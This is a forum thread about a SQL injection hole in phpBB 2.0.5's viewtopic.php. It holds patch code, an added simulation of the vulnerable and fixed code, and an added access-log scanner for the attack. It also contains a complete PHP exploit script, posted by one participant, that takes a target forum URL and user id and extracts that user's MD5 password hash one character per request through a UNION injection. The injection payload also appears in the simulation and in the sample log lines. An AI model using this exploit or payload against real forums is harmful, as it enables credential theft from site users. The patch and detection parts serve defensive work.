Another hole in phpBB 2.0.5

IBSN-RELOAD

Guest
I don't know English well, but I understood what to replace, but:
1) What is the hole???
2) Has anyone checked it? I don't want to be the first whose forum goes down...
 

*.MOFF.*

Guest
find this code in viewtopic.php:
PHP:
if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) ) 
{ 
      $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]); 
} 
else if ( isset($HTTP_GET_VARS['topic']) ) 
{ 
      $topic_id = intval($HTTP_GET_VARS['topic']); 
}
add this there:
PHP:
$topic_id = $post_id = false;
++++++++++++++++++++++++++

then scroll down and find:

PHP:
$join_sql_table = ( !isset($post_id) ) ? '' : ", " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2 "; 
$join_sql = ( !isset($post_id) ) ? "t.topic_id = $topic_id" : "p.post_id = $post_id AND t.topic_id = p.topic_id AND p2.topic_id = p.topic_id AND p2.post_id <= $post_id"; 
$count_sql = ( !isset($post_id) ) ? '' : ", COUNT(p2.post_id) AS prev_posts"; 

$order_sql = ( !isset($post_id) ) ? '' : "GROUP BY p.post_id, t.topic_id, t.topic_title, t.topic_status, t.topic_replies, t.topic_time, t.topic_type, t.topic_vote, t.topic_last_post_id, f.forum_name, f.forum_status, f.forum_id, f.auth_view, f.auth_read, f.auth_post, f.auth_reply, f.auth_edit, f.auth_delete, f.auth_sticky, f.auth_announce, f.auth_pollcreate, f.auth_vote, f.auth_attachments ORDER BY p.post_id ASC";
replace that code with:
PHP:
$join_sql_table = ( empty($post_id) ) ? '' : ", " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2 "; 
$join_sql = ( empty($post_id) ) ? "t.topic_id = $topic_id" : "p.post_id = $post_id AND t.topic_id = p.topic_id AND p2.topic_id = p.topic_id AND p2.post_id <= $post_id"; 
$count_sql = ( empty($post_id) ) ? '' : ", COUNT(p2.post_id) AS prev_posts"; 

$order_sql = ( empty($post_id) ) ? '' : "GROUP BY p.post_id, t.topic_id, t.topic_title, t.topic_status, t.topic_replies, t.topic_time, t.topic_type, t.topic_vote, t.topic_last_post_id, f.forum_name, f.forum_status, f.forum_id, f.auth_view, f.auth_read, f.auth_post, f.auth_reply, f.auth_edit, f.auth_delete, f.auth_sticky, f.auth_announce, f.auth_pollcreate, f.auth_vote, f.auth_attachments ORDER BY p.post_id ASC";
that's it
 

IBSN-RELOAD

Guest
PS: that part I understood; the thing is, I didn't understand what the bug is??? Everything works fine for me, so what bug is there???
 

IBSN-RELOAD

Guest
Did as written =( SQL error. Thanks, good thing I made a backup.
 

SeazoN

Guest
PHP:
$topic_id = $post_id = 0;
if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
{
	$topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
}
else if ( isset($HTTP_GET_VARS['topic']) )
{
	$topic_id = intval($HTTP_GET_VARS['topic']);
}
false can lead to an error, that's all.
And in general this injection is more theoretical than real; register_globals = off kills it entirely.
 
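As an added example that is not part of the thread and not phpBB's own code, this stand-alone PHP CLI script models the viewtopic.php variable setup quoted in the posts above, once as in 2.0.5 and once in the corrected form, and runs constructed requests through both. register_globals is simulated with extract(); the function names, the sample requests and the "rejected" return value standing in for phpBB's message_die() are assumptions of this example.

```php
<?php
// Added example, not code from the thread or from phpBB: models the
// viewtopic.php variable setup and WHERE-clause construction discussed
// above. clause_2_0_5(), clause_fixed(), the sample requests and the
// 'rejected' stand-in for message_die() are this example's own.

// register_globals=on turned every query-string key into a PHP variable
// before the script ran; extract() reproduces that for one request.
function clause_2_0_5(array $get, bool $register_globals): string
{
    if ($register_globals) {
        extract($get, EXTR_SKIP);
    }
    if (isset($get['t'])) {
        $topic_id = intval($get['t']);
    } elseif (isset($get['topic'])) {
        $topic_id = intval($get['topic']);
    }
    if (isset($get['p'])) {
        $post_id = intval($get['p']);
    }
    // Assumed up-front check: neither id given -> request rejected. With
    // register_globals=on a raw topic_id=... parameter already satisfies
    // isset($topic_id), so the attacker's string survives unchanged.
    if (!isset($topic_id) && !isset($post_id)) {
        return 'rejected';
    }
    return (!isset($post_id))
        ? "t.topic_id = $topic_id"
        : "p.post_id = $post_id AND t.topic_id = p.topic_id";
}

function clause_fixed(array $get, bool $register_globals): string
{
    if ($register_globals) {
        extract($get, EXTR_SKIP);
    }
    $topic_id = $post_id = 0;   // overwrite whatever register_globals left behind
    if (isset($get['t'])) {
        $topic_id = intval($get['t']);
    } elseif (isset($get['topic'])) {
        $topic_id = intval($get['topic']);
    }
    if (isset($get['p'])) {
        $post_id = intval($get['p']);
    }
    if (!$topic_id && !$post_id) {
        return 'rejected';
    }
    // isset() is true for an initialised 0, so the test has to become empty()
    return (empty($post_id))
        ? "t.topic_id = $topic_id"
        : "p.post_id = $post_id AND t.topic_id = p.topic_id";
}

// Constructed requests: a normal topic view, the injected topic_id with
// register_globals on and off, and a post view.
$injection = '-1 union select ord(substring(user_password,1,1)) from phpbb_users where user_id=2 /*';
$cases = [
    'normal, t=5'                    => [['t' => '5'], true],
    'injected topic_id, globals on'  => [['sid' => '1', 'topic_id' => $injection, 'view' => 'newest'], true],
    'injected topic_id, globals off' => [['sid' => '1', 'topic_id' => $injection, 'view' => 'newest'], false],
    'post view, p=7'                 => [['p' => '7'], true],
];
foreach ($cases as $label => [$get, $rg]) {
    printf("%-32s 2.0.5: %s\n%-32s fixed: %s\n", $label, clause_2_0_5($get, $rg), '', clause_fixed($get, $rg));
}

// Why 0 rather than false: false interpolates into a string as "", leaving
// "t.topic_id = " (an SQL syntax error), and isset() is true for false, so
// the original !isset($post_id) test could no longer tell the cases apart.
$post_id = false;
printf("isset(false): %s  empty(false): %s  \"t.topic_id = %s\" vs \"t.topic_id = %s\"\n",
    var_export(isset($post_id), true), var_export(empty($post_id), true), false, 0);
```

Run it with the php CLI. The second case is the one the 2.0.5 code turns into `t.topic_id = -1 union select ...`; the third case shows that the same request is rejected when register_globals is off, which is SeazoN's point; the corrected version rejects both.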

fixxxer

К.О.
Club partner
I found, without much trouble, a host with register_globals = on and MySQL 4.x. For example, Valuehost. :)

script:
PHP:
<?php
/////////////////////////////////////////////////////////////////
// phpBB 2.0.5 exploit
//
// using SQL injection vuln in viewtopic.php
//
// based on phpbb_sql.pl by Rick <[email protected]>
//
// fixxxer <fixxxer[at]dizenteria[dot]ru>
/////////////////////////////////////////////////////////////////
error_reporting (E_ERROR | E_WARNING | E_PARSE);
set_magic_quotes_runtime(0);
set_time_limit(0);
?><html><head><title>phpBB 2.0.5 exploit</title></head><body><?php

if (isset($_POST['phpbburl']) && isset($_POST['phpbbid'])) {
  do {

    $url = @parse_url($_POST['phpbburl']);

    if (!isset($url['host'])) {
      echo "Bad URL entered";
      break;
    }

    $host = $url['host'];
    $port = isset($url['port'])?$url['port']:80;
    // strip a trailing script name so that $path ends at the forum directory
    $path = isset($url['path'])?preg_replace("![^/]*\.php.*!","",$url['path']):"/";

    // one request per character of the 32-character MD5 password hash
    for ($tries=0, $p='', $i=1; $i<33; $i++) {

      $f = fsockopen($host, $port, $errno, $errstr, 30);
      if (!$f) {
        echo "Error # $errno while connecting to $host:$port - $errstr<br>";
        break;
      }

      // topic_id is used raw only when register_globals=on and no t= or topic=
      // parameter is given. sid=1 plus the sid cookie take viewtopic.php down
      // the view=newest path, which ends in a redirect whose '#' anchor is the
      // selected value, i.e. the ord() of one hash character. UNION needs
      // MySQL 4.x; the /* comments out the rest of phpBB's query.
      $rq = "GET ".$path."viewtopic.php?".
        "sid=1&topic_id=-1%20".
        urlencode("union select ord(substring(user_password,$i,1)) from phpbb_users ".
        "where user_id=".$_POST['phpbbid']." /* ") .
        "&view=newest HTTP/1.0".
        "\r\nHost: $host\r\nCookie: phpbb2mysql_sid=1\r\n\r\n";

      if($_POST['debug']==1) echo "<b>[$i]</b> $rq";

      fwrite($f, $rq);

      // read the response headers until the Location: line with the anchor
      for ($letter=''; !feof($f); ) {
        $re = fgets($f,256);
        if($_POST['debug']==1) echo "<table border=1 width=100%><tr><td>$re</table>";
        if (preg_match("/Location[^#]*#([0-9]+)/", $re, $a)) {
          $letter = chr($a[1]);
          break;
        }
      }

      fclose($f);

      if ($letter=='') {
        if ($tries++<3) {
          if($_POST['debug']==1)
            echo "Failed to receive hash letter # $i - retrying [$tries/3]...<br>";
          $i--;
          continue;
        } else {
          echo "Passwd hash letter # $i could not be retrieved<br>";
          break;
        }
      }

      $p .= $letter;
      $tries=0;
    }

    if(strlen($p)==32)
      echo "<br>Password hash: \"$p\"<br>";
    else
      echo "<br>There were some errors. We could retrieve just this: \"$p\"";

  } while(false); 
  echo "<hr>"; 
}

?><form method=post>
URL to phpBB forum: <input type=text size=50 name=phpbburl><br>
User's id: <input type=text size=20 name=phpbbid><br>
<input type=submit value=" Go "><input type=checkbox name=debug value=1> Debug info
</form>
Attention: this works only if register_globals=on and MySQL version is 4.x on the attacked server
</body></html>
 
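For the admin who asked whether anyone had checked: as an added example that is not part of the thread, a PHP script that scans access-log lines for viewtopic.php requests whose topic or post parameters are not plain integers, which is exactly what the exploit above sends. The function name and the three log lines are constructed for this example; the encoded query string in the second line is what urlencode() in the script above produces.

```php
<?php
// Added example, not from the thread: find viewtopic.php requests in an
// access log whose topic/post parameters are not plain integers. The
// injected topic_id is URL-encoded in the log, so the query string is
// decoded before checking. Function name and log lines are constructed.

function suspicious_viewtopic_requests(array $lines): array
{
    $id_params = ['t', 'topic', 'topic_id', 'p', 'post_id'];
    $hits = [];
    foreach ($lines as $i => $line) {
        if (!preg_match('#"(?:GET|POST) \S*viewtopic\.php\?(\S*) HTTP/#', $line, $m)) {
            continue;
        }
        parse_str($m[1], $params);   // decodes %xx and '+' the way the web server does
        foreach ($id_params as $key) {
            if (!isset($params[$key]) || !is_string($params[$key])) {
                continue;
            }
            if (!preg_match('/^-?\d+$/', $params[$key])) {
                $hits[] = ['line' => $i + 1, 'param' => $key, 'value' => $params[$key]];
            }
        }
    }
    return $hits;
}

// Constructed sample: a normal topic view, the exploit's request for the
// first hash character (urlencode() turns spaces into '+'), and a post view.
$log = [
    '10.0.0.5 - - [10/Jul/2003:12:00:01 +0400] "GET /forum/viewtopic.php?t=5 HTTP/1.0" 200 8123',
    '10.0.0.9 - - [10/Jul/2003:12:00:02 +0400] "GET /forum/viewtopic.php?sid=1&topic_id=-1%20union+select+ord%28substring%28user_password%2C1%2C1%29%29+from+phpbb_users+where+user_id%3D2+%2F%2A+&view=newest HTTP/1.0" 302 0',
    '10.0.0.5 - - [10/Jul/2003:12:00:03 +0400] "GET /forum/viewtopic.php?p=7 HTTP/1.0" 200 6311',
];

foreach (suspicious_viewtopic_requests($log) as $hit) {
    printf("line %d: %s=%s\n", $hit['line'], $hit['param'], $hit['value']);
}
```

Only the second line is reported, with the decoded `union select ord(substring(user_password,1,1)) ...` payload. A real extraction run shows up as 32 such requests in a row with the substring offset counting from 1 to 32, each answered with a redirect.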